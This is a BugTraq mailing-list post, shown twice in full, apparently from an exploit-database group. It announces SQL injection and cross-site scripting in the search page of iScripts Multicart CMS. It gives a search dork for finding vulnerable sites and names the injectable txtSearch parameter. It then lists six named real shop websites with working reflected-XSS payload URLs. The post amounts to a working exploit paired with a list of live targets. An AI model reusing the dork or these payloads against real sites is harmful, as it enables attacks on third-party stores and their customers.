BugTraq
Back to list
|
Post reply
iScripts Multicart Cms Multiple Vulnerability
Dec 07 2015 02:39PM
iedb team gmail com
Sql And Xss Vulnerability In iScripts Multicart Cms All Version
#################################
#
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@
#
#####################################
#####################################
# Iranian Exploit DataBase
# iScripts Multicart Cms Multiple Vulnerability
# Vendor site : http://www.iscripts.com/multicart/
# Dork : "Powered by iScripts Multicart"
# Author : IeDb
# Site : Www.IeDb.Ir - xssed.Ir
# Vulnerability attack information site : http://xssed.Ir/
#####################################
Bug :
http://www.site.com/search.php?chkProductName=on&chkIncludeSubcategories
=on&sd=1&txtSearch=[Xss][sql]
Dem0 :
http://www.farmdrop.org/shop/search.php?chkProductName=on&chkIncludeSubc
ategories=on&sd=1&txtSearch='"><script>alert(/iedb.ir/)</script>
http://artisanfantasy.com/search.php?chkProductName=on&chkIncludeSubcate
gories=on&sd=1&txtSearch='"><script>alert(/iedb.ir/)</script>
http://flowergardeners.com/Shop/search.php?chkProductName=on&chkIncludeS
ubcategories=on&sd=1&txtSearch='"><script>alert(/iedb.ir/)</script>
https://www.totalboxshop.tv/uk/search.php?chkProductName=on&chkIncludeSu
bcategories=on&sd=1&txtSearch='"><script>alert(/iedb.ir/)</script>
http://www.youneik.com/search.php?chkProductName=on&chkIncludeSubcategor
ies=on&sd=1&txtSearch='"><script>alert(/iedb.ir/)</script>
http://www.lilhalfpintshop.com/search.php?chkProductName=on&chkIncludeSu
bcategories=on&sd=1&txtSearch='"><script>alert(/iedb.ir/)</script>
#####################################
# Archive Exploit = http://iedb.ir/exploits-4281.html
#####################################
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
#################################
#
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@
#
#####################################
#####################################
# Iranian Exploit DataBase
# iScripts Multicart Cms Multiple Vulnerability
# Vendor site : http://www.iscripts.com/multicart/
# Dork : "Powered by iScripts Multicart"
# Author : IeDb
# Site : Www.IeDb.Ir - xssed.Ir
# Vulnerability attack information site : http://xssed.Ir/
#####################################
Bug :
http://www.site.com/search.php?chkProductName=on&chkIncludeSubcategories
=on&sd=1&txtSearch=[Xss][sql]
Dem0 :
http://www.farmdrop.org/shop/search.php?chkProductName=on&chkIncludeSubc
ategories=on&sd=1&txtSearch='"><script>alert(/iedb.ir/)</script>
http://artisanfantasy.com/search.php?chkProductName=on&chkIncludeSubcate
gories=on&sd=1&txtSearch='"><script>alert(/iedb.ir/)</script>
http://flowergardeners.com/Shop/search.php?chkProductName=on&chkIncludeS
ubcategories=on&sd=1&txtSearch='"><script>alert(/iedb.ir/)</script>
https://www.totalboxshop.tv/uk/search.php?chkProductName=on&chkIncludeSu
bcategories=on&sd=1&txtSearch='"><script>alert(/iedb.ir/)</script>
http://www.youneik.com/search.php?chkProductName=on&chkIncludeSubcategor
ies=on&sd=1&txtSearch='"><script>alert(/iedb.ir/)</script>
http://www.lilhalfpintshop.com/search.php?chkProductName=on&chkIncludeSu
bcategories=on&sd=1&txtSearch='"><script>alert(/iedb.ir/)</script>
#####################################
# Archive Exploit = http://iedb.ir/exploits-4281.html
#####################################
[ reply ]